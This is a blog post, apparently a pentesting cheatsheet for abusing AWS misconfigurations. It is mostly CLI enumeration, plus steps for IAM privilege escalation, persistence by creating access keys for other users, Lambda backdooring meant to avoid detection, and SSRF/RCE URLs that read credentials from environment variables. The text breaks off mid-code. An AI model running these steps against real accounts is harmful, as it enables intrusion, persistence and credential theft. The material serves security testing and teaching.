Jekyll2022-10-17T21:07:03+00:00https://www.untrustaland.com/feed.xmlUntrustalandUntrustaland is a blog about hackingpop3retAWSome Pentesting Cheatsheet2022-10-05T17:11:00+00:002022-10-05T17:11:00+00:00https://www.untrustaland.com/blog/awsome-pentesting<p>This guide was created to help pentesters learning more about AWS misconfigurations and ways to abuse them.</p>
<ul>
<li>It was created with my notes gathered with uncontable hours of study and annotations from various places</li>
<li>It’s assumed that you have the AWS keys (<del>This is not difficult to find, just look in developer’s github</del>)</li>
<li>Author -> pop3ret</li>
</ul>
<h1 id="general-guidelines-and-tools">General Guidelines and tools</h1>
<ul>
<li><a href="https://github.com/nccgroup/ScoutSuite">Scout Suite</a> -> Security Healthcheck</li>
<li><a href="https://github.com/RhinoSecurityLabs/pacu">Pacu</a> -> AWS Exploitation Framework</li>
<li><a href="">https://github.com/cyberark/SkyArk</a> -> Discover most privileged users within AWS infrastructure</li>
<li><a href="https://boto3.amazonaws.com/v1/documentation/api/latest/index.html">Boto3</a> -> AWS SDK for python</li>
<li><a href="https://github.com/NetSPI/aws_consoler">AWS Consoler</a> -> Convert AWS Credentials into a console access</li>
</ul>
<h1 id="aws-cheatsheet">AWS Cheatsheet</h1>
<h2 id="searching-for-open-buckets">Searching for open buckets</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://buckets.grayhatwarfare.com/
</code></pre></div></div>
<h2 id="arn">ARN</h2>
<p>A number to identify an object in AWS</p>
<p>Example</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>arn:aws:iam:100:user/admin
</code></pre></div></div>
<ol>
<li>Field -> ARN</li>
<li>Field -> Type, most of time will be AWS</li>
<li>Field -> service, in this case IAM</li>
<li>Field -> User ID</li>
<li>Field -> entity identifier</li>
</ol>
<h1 id="iam">IAM</h1>
<ul>
<li>It’s assumed that we have gain access to the AWS Credentials</li>
<li>We can see if we have permissions using <a href="**[https://policysim.aws.amazon.com/](https://policysim.aws.amazon.com/)**">Amazon’s policy simulator</a></li>
<li>Always look for policies and roles with the * symbol.</li>
<li>See which user do not have MFA enabled</li>
<li>User enumeration in IAM Panel and group enumeration</li>
<li>We can also enumerate roles from the same interface</li>
<li>Root user is super admin</li>
</ul>
<h2 id="configure-aws-cli">Configure AWS cli</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws configure
</code></pre></div></div>
<p>Or configure it using a profile</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws configure --profile example_name
</code></pre></div></div>
<p>The credential file is located in <code class="language-plaintext highlighter-rouge">~/.aws/credentials</code></p>
<h2 id="listing-iam-access-keys">Listing IAM access Keys</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-acess-keys
</code></pre></div></div>
<h2 id="1-enumerating-iam-users">1. Enumerating IAM users</h2>
<h3 id="checking-credentials-for-the-user">Checking credentials for the user</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity
</code></pre></div></div>
<h3 id="listing-iam-users">Listing IAM Users</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-users
</code></pre></div></div>
<h3 id="listing-the-iam-groups-that-the-specified-iam-user-belongs-to">Listing the IAM groups that the specified IAM user belongs to</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-groups-for-user --user-name user-name
</code></pre></div></div>
<h3 id="listing-all-manages-policies-that-are-attached-to-the-specified-iam-user">Listing all manages policies that are attached to the specified IAM user</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-user-policies --user-name user-name
</code></pre></div></div>
<h3 id="listing-the-names-of-the-inline-policies-embedded-in-the-specified-iam-user">Listing the names of the inline policies embedded in the specified IAM user</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-user-policies --user-name user-name
</code></pre></div></div>
<h2 id="2-enumeration-groups-iam">2. Enumeration Groups IAM</h2>
<h3 id="listing-iam-groups">Listing IAM Groups</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-groups
</code></pre></div></div>
<h3 id="listing-all-managed-policies-that-are-attached-to-the-specified-iam-group">Listing all managed policies that are attached to the specified IAM Group</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-group-policies --group-name group-name
</code></pre></div></div>
<h3 id="listing-the-names-of-the-inline-policies-embedded-in-the-specified-iam-group">Listing the names of the inline policies embedded in the specified IAM Group</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-group-policies --group-name group name
</code></pre></div></div>
<h2 id="3-enumeratig-roles">3. Enumeratig Roles</h2>
<h3 id="listing-iam-roles">Listing IAM Roles</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-roles
</code></pre></div></div>
<h3 id="listsing-all-managed-policies-that-are-attached-to-the-specified-iam-role">Listsing all managed policies that are attached to the specified IAM role</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-role-policies --role-name role-name
</code></pre></div></div>
<h3 id="listing-the-names-of-the-inline-policies-embedded-in-the-specified-iam-role">Listing the names of the inline policies embedded in the specified IAM role</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-role-policies --role-name role-name
</code></pre></div></div>
<h2 id="4-enumerating-policies">4. Enumerating Policies</h2>
<h3 id="listing-of-iam-policies">Listing of IAM Policies</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-policies
</code></pre></div></div>
<h3 id="retrieving-information-about-the-specified-managed-policy">Retrieving information about the specified managed policy</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy --policy-arn policy-arn
</code></pre></div></div>
<h3 id="listing-information-about-the-versions-of-the-specified-manages-policy">Listing information about the versions of the specified manages policy</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-policy-versions --policy-arn policy-arn
</code></pre></div></div>
<h3 id="retrieving-information-about-the-specific-version-of-the-specified-managed-policy">Retrieving information about the specific version of the specified managed policy</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy-version --policy-arn policy-arn --version-id version-id
</code></pre></div></div>
<h3 id="retrieving-the-specified-inline-policy-document-that-is-embedded-on-the-specified-iam-user--group--role">Retrieving the specified inline policy document that is embedded on the specified IAM user / group / role</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-user-policy --user-name user-name --policy-name policy-name
aws iam get-group-policy --group-name group-name --policy-name policy-name
aws iam get-role-policy --role-name role-name --policy-name policy-name
</code></pre></div></div>
<h2 id="5-exploitation-scenario">5. Exploitation Scenario</h2>
<h3 id="general-guidelines">General Guidelines</h3>
<ul>
<li>AWS token compromised (Developer machine, phishing etc) and we as attackers will gonna use it.</li>
</ul>
<h3 id="enumerating-the-owner-of-the-key-and-initial-compromise">Enumerating the owner of the key and initial compromise</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity
</code></pre></div></div>
<p>Or specifing a profile</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity --profile example_name
</code></pre></div></div>
<p>If you have the password of the root account instead of key, log in</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://signin.aws.amazon.com/console
</code></pre></div></div>
<p>Or use the IAM in case the account is not the root</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://account-id-here.signin.aws.amazon.com/console
</code></pre></div></div>
<p><em>The account id can be cathered using the sts get caller command.</em></p>
<h3 id="privilege-escalation">Privilege Escalation</h3>
<ul>
<li>Privilege escalation on AWS is based on misconfigurations, if we have more permissions than necessary, its possible to obtain higher privileges.</li>
</ul>
<h4 id="study-case">Study Case</h4>
<ul>
<li>A user was compromised with the <em>List Policy</em> and <em>Put User Policy</em> permissions, an attacker could leverage this <em>Put User</em> privilege to add an inline administrator to itself, making it administrator of the instance.</li>
</ul>
<h5 id="exploitation">Exploitation</h5>
<ol>
<li>Getting the IAM user</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity
</code></pre></div></div>
<ol>
<li>Listing policies attached to an user</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-user-policies --user-name example_name -- profile example_profile
</code></pre></div></div>
<ol>
<li>Retrieving informations about an specific policy</li>
</ol>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy --policy-arn policy_arn
</code></pre></div></div>
<p>If there are more than one version of the policy, we can also list them</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-policy-versions --policy-arn policy_arn
</code></pre></div></div>
<p>Now we can finally retrieve the contents of the policy</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy-version --policy-arn example_arn --version-id id_example
</code></pre></div></div>
<p><em>It’s important to use the command above to chech the information about the default policy</em></p>
<ol>
<li>Escalation</li>
</ol>
<p>If we have the PutUserPolicy is enabled, we can add an inline administrator policy to our user.</p>
<p>Administrator policy example</p>
<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
</span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2021-10-17"</span><span class="p">,</span><span class="w">
</span><span class="nl">"Statement"</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
</span><span class="p">{</span><span class="w">
</span><span class="nl">"Effect"</span><span class="p">:</span><span class="s2">"Allow"</span><span class="p">,</span><span class="w">
</span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
</span><span class="s2">"*"</span><span class="w">
</span><span class="p">],</span><span class="w">
</span><span class="nl">"Resource"</span><span class="p">:[</span><span class="w">
</span><span class="s2">"*"</span><span class="w">
</span><span class="p">]</span><span class="w">
</span><span class="p">}</span><span class="w">
</span><span class="p">]</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>
<h3 id="attaching-this-policy-into-our-user">Attaching this policy into our user</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam put-user-policy --user-name example_username --policy-name example_name --policy-document file://AdminPolicy.json
</code></pre></div></div>
<h3 id="listing-inline-policies-of-our-user">Listing inline policies of our user</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-user-policies --user-name example_name
</code></pre></div></div>
<h3 id="listing-a-restricted-resource-example-s3">Listing a restricted resource (Example S3)</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws s3 ls --profile example_profile
</code></pre></div></div>
<h3 id="interesting-permissions">Interesting Permissions</h3>
<ul>
<li>iam:AttachUserPolicy -> Attach a policy to a user</li>
<li>iam:AttachGroupPolicy -> Attach a policy to a group</li>
<li>iam:AttachRolePolicy -> Attach a policy to a role</li>
<li>iam:CreateAccessKey -> Creates a new access key</li>
<li>iam:CreateLoginProfile -> Creates a new login profile</li>
<li>iam:UpdateLoginProfile -> Update an existing login profile</li>
<li>iam:PassRole and ec2:RunInstances -> Creates an EC2 instance with an existing instance profile</li>
<li>iam:PuserUserPolicy -> Create/Update an inline policy</li>
<li>iam:PutGroupPolicy -> Create/Update an inline policy for a group</li>
<li>iam:PutRolePolicy -> Create/Update an inline policy for a role</li>
<li>iam:AddUserToGroup -> Add an user to a group</li>
<li>iam:UpdateAssumeRolePolicy and sts:AssumeRole -> Update the AssumeRolePolicyDocument of a role</li>
<li>iam:PassRole,lambda:CreateFunction and lambda:InvokeFunction -> Pass a role to a new lambda function and invoke it</li>
<li>lambda:UpdateFunctionCode -> Update the code of an existing lambda function</li>
</ul>
<h3 id="persistence--backdooring">Persistence & Backdooring</h3>
<ul>
<li>Suppose we have two users, the user A has permissions to create Access Keys to user B, this misconfig allows us to create an access key for user B and persist our access.</li>
</ul>
<h4 id="creating-a-new-acess-key-for-another-user">Creating a new acess key for another user</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam create-access-key --username example_username
</code></pre></div></div>
<h4 id="configuring-aws-cli-for-the-new-user">Configuring AWS cli for the new user</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws configure --profile example_profile
</code></pre></div></div>
<p><em>Remember, an user can have the maximum of 2 access keys</em>.</p>
<h4 id="testing-the-credential">Testing the credential</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity --profile example_profile
</code></pre></div></div>
<h4 id="accessing-more-credentials">Accessing more credentials</h4>
<ul>
<li>It’s possible to assume other roles with the sts:AssumeRole permission (Example: An user doesn’t have access to an s3 instance, but it has this permission, we can easily assume other roles if we are in the trust relashionship, increasing our access in the instance)</li>
</ul>
<h5 id="listing-managed-policies-attached-to-an-user">Listing managed policies attached to an user</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-user-policies --user-name example_name
</code></pre></div></div>
<h5 id="retrieving-information-about-an-specific-policy">Retrieving information about an specific policy</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy --policy-arn ARN
</code></pre></div></div>
<h5 id="listing-information-about-the-version-of-the-policy">Listing information about the version of the policy</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-policy-versions --policy-arn ARN
</code></pre></div></div>
<h5 id="retrieving-information-about-an-specific-version">Retrieving information about an specific version</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy-version --policy-arn policy_arn --version-id ID
</code></pre></div></div>
<h5 id="listing-iam-roles-1">Listing IAM roles</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-roles
</code></pre></div></div>
<h5 id="listing-trust-relashionship-between-role-and-user-which-roles-we-can-assume">Listing trust relashionship between role and user (Which roles we can assume)</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-role --role-name role_name
</code></pre></div></div>
<h5 id="listing-all-managed-policies-attached-to-the-specific-iam-role">Listing all managed policies attached to the specific IAM role</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam liast-attached-role-policies --role-name role_name
</code></pre></div></div>
<h5 id="retrieving-information-about-the-specified-version-of-the-policy">Retrieving information about the specified version of the policy</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy-version --policy-arn policy_arn --version-id ID
</code></pre></div></div>
<h5 id="getting-temporary-credentials-for-the-role">Getting temporary credentials for the role</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts assume-role --role-arn role_arn --role-session-name session_name
</code></pre></div></div>
<h5 id="configuring-aws-cli-with-newer-credentials-on-linux">Configuring AWS cli with newer credentials (On Linux)</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>export AWS_ACCESS_KEY_ID
export AWS_SECRET_KEY
export AWS_SESSION_TOKEN
</code></pre></div></div>
<h5 id="getting-information-about-the-temporary-credential">Getting information about the temporary credential</h5>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity
</code></pre></div></div>
<h1 id="s3---simple-storage-system">S3 - Simple Storage System</h1>
<ul>
<li>Storage system that allow users to store and retrieve data.</li>
<li>List,Get,Put and Delete operations can be performed on the objects of the bucket</li>
<li>Buckets are global, meaning that they are available to all regions</li>
<li>It’s possible to bruteforce the bucket name and region in the URL</li>
<li>Its possible to apply ACL’s to bucket and object level and bucket policies for bucket level</li>
<li>There is also time limited URL’s and identity based policies</li>
<li>Identity policies are enumerated using IAM commands</li>
</ul>
<h2 id="enumeration">Enumeration</h2>
<h3 id="listing-all-buckets-in-aws-account">Listing all buckets in aws account</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws s3api list-buckets
</code></pre></div></div>
<h3 id="getting-information-about-a-specific-bucket">Getting information about a specific bucket</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws s3api get-bucket-acl --bucket name
</code></pre></div></div>
<h3 id="getting-information-about-a-specific-bucket-policy">Getting information about a specific bucket policy</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws s3api get-bucket-policy --bucket name
</code></pre></div></div>
<h3 id="getting-the-public-access-block-configuration-for-an-s3-bucket">Getting the Public Access Block configuration for an S3 bucket</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws s3api get-public-access-block --bucket name
</code></pre></div></div>
<h3 id="listing-all-objects-in-a-specific-bucket">Listing all objects in a specific bucket</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws s3api list-objects --bucket name
</code></pre></div></div>
<h3 id="getting-acl-information-about-specific-object">Getting ACL information about specific object</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws s3api get-object-acl --bucket-name name --key object_name
</code></pre></div></div>
<h2 id="data-exfiltration">Data Exfiltration</h2>
<ul>
<li>It’s possible to brute-force files in the bucket</li>
<li>If the bucket is misconfigured, we can read data through web browser, cli/api or time-based URL.</li>
</ul>
<h3 id="public-access">Public Access</h3>
<ul>
<li>Just enter the URL in the browser</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://bucket-name.region.amazonaws.com/secret.txt
</code></pre></div></div>
<h3 id="authenticated-user">Authenticated User</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws s3api get-object --bucket name --key object-name download-file-location
</code></pre></div></div>
<h3 id="time-based-url">Time-Based Url</h3>
<ul>
<li>Generate a time based url for an object</li>
<li>Userful if the object is not public</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws s3 presign s3://bucket-name/object-name --expires-in 605000
</code></pre></div></div>
<h1 id="lambda--api-gateway">Lambda & API Gateway</h1>
<ul>
<li>Serverless event driven platform</li>
<li>Runs code in response to events and automatically manages computing resources required by that code</li>
<li>Can trigger from other AWS services or call directly from the API Gateway</li>
<li>A lambda function is a piece of code that is executed whenever is triggered by an event from an event source</li>
<li>API Gateway is an AWS service for creating, publishing, maintaining, monitoring and securing REST, HTTP and WebSocket API</li>
<li>API Gateway can be used to trigger lambda functions in a synchronous (api gateway), asynchronous (event) or stream (Poll Based) way.</li>
<li>If we found a lambda function that access an S3 (Example) its possible to change its code and gain access to the files.</li>
<li>If API Gateway is used, we can enumerate the API to see how its possible to invoke the lambda function (Craft the URL).</li>
</ul>
<h2 id="enumeration-1">Enumeration</h2>
<h3 id="listing-all-lambda-functions">Listing All lambda functions</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda list-functions
</code></pre></div></div>
<h3 id="listing-information-about-a-specific-lambda-function">Listing information about a specific lambda function</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda get-function --function-name function_name
</code></pre></div></div>
<ul>
<li><em>This command enables us to download the source code of the lambda function</em></li>
</ul>
<h3 id="listing-policy-information-about-the-function">Listing policy information about the function</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda get-policy --function-name function_name
</code></pre></div></div>
<ul>
<li>We can get informations like who can execute this functions, ID and other informations with this command</li>
</ul>
<h3 id="listing-the-event-source-mapping-information-about-a-lambda-function">Listing the event source mapping information about a lambda function</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda list-event-source-mappings --function-name function_name
</code></pre></div></div>
<h3 id="listing-lambda-layers-depedencies">Listing Lambda Layers (Depedencies)</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda list-layers
</code></pre></div></div>
<h3 id="listing-full-information-about-a-lambda-layer">Listing full information about a lambda layer</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda get-layer-version --layer-name name --version-number version_number
</code></pre></div></div>
<h3 id="listing-rest-apis">Listing Rest API’S</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-rest-apis
</code></pre></div></div>
<h3 id="listing-information-about-a-specific-api">Listing information about a specific API</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-rest-api --rest-api-id ID
</code></pre></div></div>
<h3 id="listing-information-about-endpoints">Listing information about endpoints</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-resources --rest-api-id ID
</code></pre></div></div>
<h3 id="listing-information-about-a-specific-endpoint">Listing information about a specific endpoint</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-resource --rest-api-id ID --resource-id ID
</code></pre></div></div>
<h3 id="listing-method-information-for-the-endpoint">Listing method information for the endpoint</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-method --rest-api-id ApiID --resource-id ID --http-method method
</code></pre></div></div>
<ul>
<li>Test various methods to see if the API supports it.</li>
</ul>
<h3 id="listing-all-versions-of-a-rest-api">Listing all versions of a rest api</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-stages --rest-api-id ID
</code></pre></div></div>
<h3 id="getting-informatin-about-a-specific-version">Getting informatin about a specific version</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-stage --res-api-id ID --stage-name NAME
</code></pre></div></div>
<h3 id="listing-api-keys">Listing API KEYS</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-api-keys --include-values
</code></pre></div></div>
<h3 id="getting-information-about-a-specific-api-key">Getting information about a specific API Key</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-api-key --api-key KEY
</code></pre></div></div>
<h2 id="initial-access">Initial Access</h2>
<ul>
<li>Its possible to get RCE through API Gateway if it executes commands.</li>
<li>If you can execute commands, there is a way to retrieve keys from the API Gateway, just use <code class="language-plaintext highlighter-rouge">env</code> , configure <code class="language-plaintext highlighter-rouge">aws cli</code> and proceed with the exploitation.</li>
</ul>
<h2 id="credential-access">Credential Access</h2>
<p>Getting credentials from Lambda can be done in 2 ways</p>
<ol>
<li>Keys in the source code</li>
<li>Keys in the enviroment variables</li>
</ol>
<p>These keys can be gathered using SSRF, RCE and so on.</p>
<h3 id="getting-credentials-using-rce">Getting credentials using RCE</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://apigateway/prod/system?cmd=env
</code></pre></div></div>
<h3 id="getting-credentials-using-ssrf">Getting credentials using SSRF</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://apigateway/prod/example?url=http://localhost:9001/2018-06-01/runtime/invocation/next
</code></pre></div></div>
<h3 id="getting-credentials-using-ssrf-and-wrappers">Getting credentials using SSRF and wrappers</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://apigateway/prod/system?cmd=file:///proc/self/environ
</code></pre></div></div>
<h3 id="getting-credentials-from-lambda-enviroment-variables-cli">Getting credentials from lambda enviroment variables (cli)</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda get-function --function-name NAME
</code></pre></div></div>
<ul>
<li>It’s important to enumerate the functions first with <code class="language-plaintext highlighter-rouge">aws lambda list-functions</code></li>
</ul>
<h2 id="persistence">Persistence</h2>
<ul>
<li>If the user has sufficient rights in the lambda function, its possible to download the source code, add a backdoor to it and upload. Everytime the lambda executes, the malicious code will also execute.</li>
<li>Always try to update the code of layers (depedencies) instead of the actual lambda code, this way our backdoor will be difficult to detect.</li>
</ul>
<h3 id="checking-which-user-is-executing">Checking which user is executing</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity
</code></pre></div></div>
<h3 id="checking-all-managed-policies-attached-to-the-user">Checking all managed policies attached to the user</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-user-policies --user-name user_name
</code></pre></div></div>
<h3 id="checking-informations-about-a-specific-policy">Checking informations about a specific policy</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy-version --policy-arn arn --version-id ID
</code></pre></div></div>
<h3 id="listing-all-lambda-functions-1">Listing all lambda functions</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda list-functions --region region
</code></pre></div></div>
<h3 id="listing-information-about-the-specified-lambda">Listing information about the specified lambda</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda get-function --function-name name
</code></pre></div></div>
<ul>
<li>Download and analyze the codes</li>
</ul>
<h3 id="listing-policy-information-about-the-specific-lambda-function">Listing policy information about the specific lambda function</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda get-policy --function-name name --profile profile --region region
</code></pre></div></div>
<ul>
<li>We can grab informations like id, who can invoke and other details with this command (Helps to build the query to execute the lambda function).</li>
</ul>
<h3 id="listing-rest-apis-1">Listing Rest API’S</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-rest-apis
</code></pre></div></div>
<h3 id="listing-information-about-a-specific-api-1">Listing information about a specific API</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-rest-api --rest-api-id ID
</code></pre></div></div>
<h3 id="listing-information-about-endpoints-1">Listing information about endpoints</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-resources --rest-api-id ID
</code></pre></div></div>
<h3 id="listing-information-about-a-specific-endpoint-1">Listing information about a specific endpoint</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-resource --rest-api-id ID --resource-id ID
</code></pre></div></div>
<h3 id="listing-method-information-for-the-endpoint-1">Listing method information for the endpoint</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-method --rest-api-id ApiID --resource-id ID --http-method method
</code></pre></div></div>
<ul>
<li>Test various methods to see if the API supports it.</li>
</ul>
<h3 id="listing-all-versions-of-a-rest-api-1">Listing all versions of a rest api</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-stages --rest-api-id ID
</code></pre></div></div>
<h3 id="getting-informatin-about-a-specific-version-1">Getting informatin about a specific version</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-stage --res-api-id ID --stage-name NAME
</code></pre></div></div>
<h3 id="uploading-the-backdoor-code-to-aws-lambda-function">Uploading the backdoor code to aws lambda function</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda update-function-code --function-name function --zip-file fileb://my-function.zip
</code></pre></div></div>
<h3 id="invoke-the-function">Invoke the Function</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl https://uj3948ie.execute-api.us-east-2.amazonaws.com/default/EXAMPLE
</code></pre></div></div>
<p>Where</p>
<ol>
<li>API-ID -> uj3948ie</li>
<li>Region -> us-east-2</li>
<li>Resource (Endpoint) -> EXAMPLE</li>
<li>Method -> Get</li>
<li>Stage (Version) -> default</li>
<li>API-Key -> None</li>
</ol>
<p><em>All these details are gathered during the enumeration.</em></p>
<h2 id="privilege-escalation-1">Privilege Escalation</h2>
<ul>
<li>If we have a user with PassRole and CreateFunction roles and also AttachRolePolicy role in a Lambda Function, its possible to create a function with a code that changes the lambda role to admin then the user to Administrator.</li>
</ul>
<h3 id="create-a-lambda-function-and-attach-a-role-to-it">Create a lambda function and attach a role to it</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda create-function --function-name my-function --runtime python3.7 --zip-file fileb://my-function.zip --handler my-function.handler --role ARN --region region
</code></pre></div></div>
<ul>
<li>Inside the function’s code, we will add the administrator permission to the role and to the user</li>
</ul>
<h4 id="example-code-to-add-the-permissions">Example code to add the permissions</h4>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">boto3</span>
<span class="kn">import</span> <span class="nn">json</span>
<span class="k">def</span> <span class="nf">handler</span><span class="p">(</span><span class="n">event</span><span class="p">,</span><span class="n">context</span><span class="p">)</span>
